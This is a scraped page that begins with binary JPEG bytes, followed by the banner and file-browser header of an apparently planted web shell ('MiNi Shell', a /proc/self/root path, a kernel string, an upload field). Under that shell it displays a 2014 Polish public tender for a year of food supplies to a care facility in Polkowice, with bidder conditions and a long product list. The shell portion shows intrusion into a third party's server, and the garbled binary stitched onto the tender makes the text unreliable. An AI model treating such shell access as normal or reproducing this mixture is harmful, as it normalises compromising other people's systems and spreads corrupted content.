JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141126/388250-N-2014.html

<p class="kh_header"><b>Polkowice: DOSTAWA ŻYWNOŚCI DO PLACÓWKI OPIEKUŃCZEJ W POLKOWICACH</b><br>
<b>Numer ogłoszenia: 388250 - 2014; data zamieszczenia: 26.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Placówka Socjalizacyjna "SKARBEK" , ul. Browarna 1, 59-100 Polkowice, woj. dolnośląskie, tel. 076 7239664 (61, 62, 63), faks 076 7239664.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.placowkiopiekuncze.polkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Placówka Opiekuńczo-Wychowawcza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ŻYWNOŚCI DO PLACÓWKI OPIEKUŃCZEJ W POLKOWICACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są Dostawy żywności do Placówki Opiekuńczej w Polkowicach. 
Zamówienie obejmuje:
 część I -  różne produkty spożywcze - CPV:15800000-6
 część II - mięso, produkty mięsne i wędliny - CPV: 15100000-9
 część III - produkty mleczarskie, mleko  - CPV: 15500000-3, 15511000-3
 część IV -  owoce i warzywa - CPV: 15300000-1
 część V - pieczywo i świeże wyroby piekarskie - CPV: 15810000-9
 część VI - jaja- CPV : 03142500-3
 część VII - ryby przetworzone i konserwowane oraz mrożonki CPV : 15220000-0, 15896000-5

Zarówno przedmiot jak i zakres zamówienia określony jest w Specyfikacji Istotnych Warunków Zamówienia w postaci Formularza cenowego (załącznik nr 2 do SIWZ), który określa potrzeby asortymentowo - ilościowe Zamawiającego na okres od 01.01.2015 r do 31.12.2015 r.  
( na 12 m-cy)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3, 15.30.00.00-1, 15.81.00.00-9, 03.14.25.00-3, 15.20.00.00-0, 15.89.60.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE JEST WYMAGANE</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunków będzie dokonywana według kryterium spełnia - nie  spełnia. Niespełnienie chociaż jednego z wymaganych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek wiedzy i doświadczenia, jeżeli wykaże że wykonał lub /i wykonuje obecnie co najmniej dwie dostawy podobne do tych, stanowiących przedmiot niniejszego zamówienia, tzn. odpowiadającymi swoim rodzajem dostawom stanowiącym przedmiot niniejszego zamówienia  o wartości nie mniejszej niż 20.000,00 zł brutto każda .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje odpowiednim sprzętem do realizacji zamówienia, spełniającym wymagania dotyczące przewozu żywności, tzn. każdy samochód, którym będzie                 dostarczana żywność będzie posiadał decyzję Państwowego Inspektoratu Sanitarnego stwierdzającą spełnienie warunków do higienicznego przewozu określonych produktów a w przypadku produktów pochodzenia zwierzęcego ( żywności pochodzenia zwierzęcego zarówno nie przetworzonej jak i przetworzonej), decyzję o nadaniu weterynaryjnego numeru identyfikacyjnego oraz  w  przypadku  pojazdów przewożących szybko psujące się artykuły żywnościowe- świadectwo ATP. Wykonawca winien wykazać, iż posiada odpowiedni potencjał techniczny w postaci narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać odpowiedni Wykaz osób, które będą uczestniczyć w realizacji dostaw,  w celu wykonania zamówienia, wraz z informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać aktualny odpis z właściwego rejestru, tj. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego i ZUS potwierdzające, że wykonawca nie zalega z opłacaniem podatków i składek , lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert; oraz przedłożyć  opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokument wystawiony dla Wykonawcy przez właściwy organ Państwowej Inspekcji Weterynaryjnej (w przypadku producenta produktów pochodzenia zwierzęcego pozostającego pod nadzorem PIW) lub Państwowej Inspekcji Sanitarnej (gdy podmiot nie będący producentem pozostaje pod nadzorem PIS) stwierdzający, że w procesie produkcji lub obrocie artykułami żywnościowymi jest stosowany system HACCP (dokument ten winien być wystawiony nie wcześniej niż 1 rok przed upływem terminu składania ofert); - dotyczy zakładów produkujących lub wprowadzających żywność do obrotu, które zgodnie z obowiązującymi przepisami podlegają takiemu obowiązkowi; jeżeli z tytułu prowadzonej działalności wykonawca nie podlega obowiązkowi wdrożenia i stosowania systemu HACCP przedstawi on stosowny dokument wystawiony dla producentów.
Dodatkowo dokument na to, iż każdy samochód, którym będzie dostarczana żywność będzie posiadał decyzję Państwowego Inspektoratu Sanitarnego stwierdzającą spełnienie warunków do higienicznego przewozu określonych produktów a w przypadku produktów pochodzenia zwierzęcego ( żywności pochodzenia zwierzęcego zarówno nie przetworzonej jak i przetworzonej), decyzję o nadaniu weterynaryjnego numeru identyfikacyjnego oraz                               w  przypadku  pojazdów przewożących szybko psujące się artykuły żywnościowe- świadectwo ATP.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.placowkiopiekuncze.polkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Placówka Socjalizacyjna  Skarbek w Polkowicach , ul. Browarna 1, 59-100 Polkowice - Tablica Ogłoszeń lub pokój Intendenta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2014 godzina 12:00, miejsce: Placówka Socjalizacyjna  Skarbek w Polkowicach , ul. Browarna 1, 59-100 Polkowice- SEKRETARIAT- parter budynku - łącznik..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budyń z cukrem w proszku, mix smaków,bez sztucznych barwników-wartość energetyczna w 100 g produktu 85 kcal,białka 3,2g, op.60g -200 szt, Fasola biała konserwowa -wartość energetyczna w 100 g produktu 100 kcal,białka 6,9g , op.400g - puszka- 50 szt, Galaretka owocowa w proszku, mix smaków,bez sztucznych barwników-
wartość energetyczna w 100 g produktu 49 kcal,białka 1,7g, op.79g 
200 szt
Koncentrat pomidorowy-zawartość ekstraktu 30%,wartość energetyczna w 100 g produktu105 kcal,białka 4,9g, op.200g-słoik -240 szt,Konserwa tyrolska sterylizowana mielonka  wysokowydajna,op.300 g - puszka 20 szt,Musztarda stołowa bez substancji konserwujących, op.200g-słoik- 50 szt,
Ciastka deserowe na wagę
5 kg

Syrop owocowy pasteryzowany, bez konserwantów mix smaków-wartość energetyczna w 100 ml produktu 26 kcal,białka 0,04 g,op.440 ml
170 szt
 Syrop owocowy - bez konserwantów,               z wit. C, op. 5 l, butelka plastikowa - wyraźnie podany termin przydatności do spożycia
20 szt
Paluszki solone-wartość energetyczna w 100 g prod. 406 kcal,białka 11,2 g op.70 g -
300 szt, Chrupki kukurydziane owocowe- skład: kasza kukurydziana,
mąka pszenna,op. 80g
200 szt
Cukier kryształ 1 kg
250 kg

Biszkopt jasny 3- warstwowy, spody do tortów,op.420 g 
2 szt
Makaron nitki-skład:mąka makaronowa z pszenicy zwyczajnej, op. 1 kg
10 kg
Makaron świder-wartość energetyczna w 100 g produktu 
357,7 kcal,białka11,0g, op.500 g
50 szt
Makaron spaghetti-wartość energetyczna w 100g produktu
345 kcal,białka 11,0g, op.500g 
30 szt
Makaron łazanka- wartość energetyczna w 100g produktu 
357,7 kcal,białka11,0g, op.400 g
20 szt
Makaron kolanko duże-wartość energetyczna w 100g produktu 
357,7 kcal,białka 11,0g, op.500 g
30 szt
Makaron muszla duża -wartość energetyczna w 100g produktu 
345 kcal,białka 11,0g, op.500 g
10 szt
Makaron muszelka mała-wartość energetyczna w 100g produktu 
357,7 kcal,białka 11,0g, op.500 g
10 szt
Makaron zacierka-wartość energetyczna w 100 g produktu 
363 kcal,białka13g, op.250 g
30 szt
Margaryna do smarowania pieczywa z dodatkiem masła -wartość energetyczna w 100 g produktu 360  kcal, białka 0,5 g, op. 550 g
250 szt
Margaryna mleczna- wartość energetyczna w 100 g produktu 541kcal,białka 0,1g, op. 250 g 
200 szt
Masło ekstra, ,  op. 250 g

250  szt
 Ser sałatkowy typu Feta  op. 250 g.
10 szt 
Mąka tortowa pszenna -wartość energetyczna w 100g produktu 
348 kcal,białka10g, op.1 kg
300 kg
Skrobia ziemniaczana, op.500 g
20  szt

Pasztet prochowicki , konserwa sterylizowana,drobiowo wieprzowa, op. 160 g - puszka
50 szt
Płatki do mleka-kukurydziane,wartość energetyczna w 100g produktu 381 kcal,białka 7,3g, grys kukurydziany 
98,2 % , op. 250g
50 szt
Płatki do mleka-zbożowe kółka miodowe,wartość energetyczna w 100 g produktu 390 kcal,białka 7,3 g,
mąki 64,3%:pszenna,kukurydziana,
owsiana i ryżowa, op.250 g
60 szt
Płatki do mleka- zbożowe kulki  smaku czekoladowym,wartość energetyczna w 100 g produktu 382kcal,białka7,7g,
mąki 61,9%:pszenna,kukurydziana i ryżowa, op.250g
60 szt
Herbata owocowa ekspresowa w torebkach,  mix smaków-wartość energetyczna w 100 ml produktu 4 kcal,białka 0,5g , op.60 g  
180 szt
Herbata czarna expresowa- torebki, wartość energetyczna w 100 ml produktu 
0 kcal,białka 0,1 g, op.100 torebek 
100 szt
Kisiel z cukrem w proszku, mix smaków, bez sztucznych barwników-
wartość energetyczna w 100 g produktu 48 kcal, białka 0,0 g, op.77 g 
200 szt
Olej  rzepakowy- wartość energetyczna w 100 g produktu 900 kcal,,op. 1 Litr

100 szt
Powidła śliwkowe, op.320 g
40 szt

Płatki owsiane górskie błyskawiczne, 
op. 500 g
40 szt
Płatki jęczmienne błyskawiczne,
wartość energetyczna w 100g produktu 345 kcal,białka9,3g,op.400g 
40 szt
Chrupki -wartość energetyczna w 100 g produktu 495 kcal,
białka 6,5g - mix smaków, op.19g 
100 szt
Cukierki owocowe -
nadziewane mix smaków, op. 1 kg
10 kg
Drops owocowy 5 smaków , op.47 g
100 szt
Wafel przekładany kremem kakaowym w czekoladzie-wartość energetyczna w 100 produktu 532 kcal,białka 10,4g, op.39g
100 szt
Zupa błyskawiczna, mix smaków-wartość energetyczna w 100 ml produktu 70 kcal, białka 1g, op.67 g
500 szt
Dżem owocowy -mix smaków niskosłodzony -wartość energetyczna w 100 g produktu 141 kcal,białka0,4 g, op. 280g-słoik-150 szt, Miód pszczeli wielokwiatowy,op.380 g-słoik-
15 szt, Napój kakaowy instant- wartość energetyczna w 100g produktu 
382 kcal,białka 3,7g ,op.300g
90 szt
Kakao ciemne o obniżonej zawartości tłuszczu, op.150 g
15 szt
Rozpuszczalna kawa zbożowa,skład: zboża 72% (jęczmień,
żyto)-wartość energetyczna w 100g produktu 331kcal,białka 4,3g,op.150 g

30 szt
Kasza manna błyskawiczna-wartość energetyczna w 100g produktu 361 kcal,białka 10,1 g, op.500 g
60 szt
Kasza jęczmienna wiejska gruba-wartość energetyczna w 100g produktu 321kcal,białka 6,9g, op.1kg
50 kg
Kasza gryczana , op.1kg

20 kg
Ryż biały długoziarnisty-wartość energetyczna w 100g produktu 349 kcal,białka 6,7g, op.1kg
30 kg
Płatki ryżowe błyskawiczne-wartość energetyczna w 100g produktu 
339 kcal,białka 6,7 g, op.250 g
45 szt
Herbatniki bureu - wartość energ. w       100 g produktu 451 kcal, białka 8,6 g., op. 100 g.
200 szt
Płatki do mleka -wartość energetyczna w 100 g prod379 kcal, białka 8,1 g,op.225g
20 szt
Zaprawa cytrynowa - skład: 
sok cytrynowy 40%, op. 500 g
10 szt
Groszek konserwowy, op.400 g 

50 szt
Kukurydza cukrowa konserwowa-wartość energetyczna w 100 g produktu 92 kcal,białka 2,1g, op.400g
60 szt
Marchew z groszkiem i kukurydzą, wartość energetyczna w 100 g produktu 51 kcal, białka 10,4g, op.500 ml-słoik 
30 szt
Ketchup łagodny-wartość energetyczna w 100 g prod. 95kcal,białka 0,5g, op 500g
100 szt
Przyprawa w płynie- typu Winiary, Magii lub równoważne, op.960 g - szklana butla
15 szt
